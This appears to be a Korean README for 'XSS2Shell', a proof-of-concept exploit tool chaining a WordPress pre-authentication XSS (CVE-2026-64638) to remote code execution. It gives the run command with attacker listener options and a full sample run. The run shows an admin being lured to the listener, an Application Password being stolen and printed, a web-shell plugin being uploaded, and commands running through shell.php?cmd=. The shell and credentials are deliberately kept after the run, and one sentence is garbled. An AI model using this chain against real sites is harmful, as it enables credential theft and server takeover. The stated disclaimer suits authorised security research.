
Wordpress 사전 인증 XSS에서 RCE로 이어지는 익스플로잇 PoC (xss2shell & CVE-2026-64638)
XSS2Shell은 CVE-2026-64638에 대한 교육용 개념 증명(PoC)으로, 취약한 WordPress 설치 환경에서 사전 인증 XSS 문제의 영향을 보여줍니다. 관리자의 명시적 참여 하에 PoC는 WordPress 애플리케이션 비밀번호를 캡처하고, 임시 페이지를 게시하며, 테스트 플러그인을 업로드하고, 생성된 셸 엔드포인트가 명령을 실행할 수 있는지 확인합니다.
기술 배경: WordPress 사전 인증 XSS에서 RCE로: CVE-2026-64638
교육 및 승인된 테스트 전용입니다. 이 도구는 소유하거나 서면 승인을 받은 WordPress 사이트에 대해서만 실행하세요. 제3자 관리자나 운영 환경을 대상으로 사용하지 마십시오.
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"
| 옵션 | 필수 여부 | 설명 |
|---|---|---|
-t, --target | 예 | WordPress 기본 URL (http:// 또는 https:// 포함) |
-c, --command | 예 | 셸이 준비된 후 실행할 명령 |
--lhost | 아니요 | 바인딩 및 광고할 리스너 IP, 기본값은 감지된 LAN IP |
--lport | 아니요 | 리스너 포트, 0은 사용 가능한 임의 포트 선택 |
--keep | 아니요 | 임시 페이지를 삭제하지 않고 게시된 산출물 유지 |
대상 URL은 자동으로 정규화되므로 끝에 붙는 슬래시는 선택 사항입니다.
/wp-login.php에 접근 가능한지 확인하고 WordPress 로그인 페이지처럼 보이는지 검사합니다.shell.php를 확인하고 요청된 명령을 실행합니다.리스너는 관리자 브라우저에서 접근 가능해야 합니다. NAT, 방화벽, 프록시, 팝업 차단, 혼합 콘텐츠 규칙으로 인해 브라우저 흐름이 완료되지 않을 수 있습니다.
__ __ _ _____
\ \ / / | |/ ____|
\ \ /\ / /__ _ __ __| | (___ ___ ___
\ \/ \/ / _ \| '__/ _` |\___ \ / _ \/ __|
\ /\ / (_) | | | (_| |____) | __/ (__
\/ \/ \___/|_| \__,_|_____/ \___|\___|
xss2shell & CVE-2026-64638 | https://wordsec.net/ - Education Purpose Only
============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
-> http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
-> http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php
============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved
[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.
성공적인 실행은 캡처된 애플리케이션 비밀번호를 xss2shell_creds.json에 저장하여 이후 실행에서 재사용할 수 있게 합니다. 임시로 게시된 페이지는 --keep을 사용하지 않는 한 명령 실행 후 자동으로 삭제됩니다.
테스트 플러그인, 셸 엔드포인트, 애플리케이션 비밀번호, 저장된 자격 증명은 현재 PoC에서 의도적으로 보존됩니다. 승인된 평가 후 테스트 사이트에서 수동으로 제거하고 로컬에서 xss2shell_creds.json을 삭제하세요.
자격 증명 파일을 민감한 정보로 취급하고 절대 버전 관리에 커밋하지 마세요.
이 저장소에 포함된 라이선스를 사용하세요.
제작: WordSec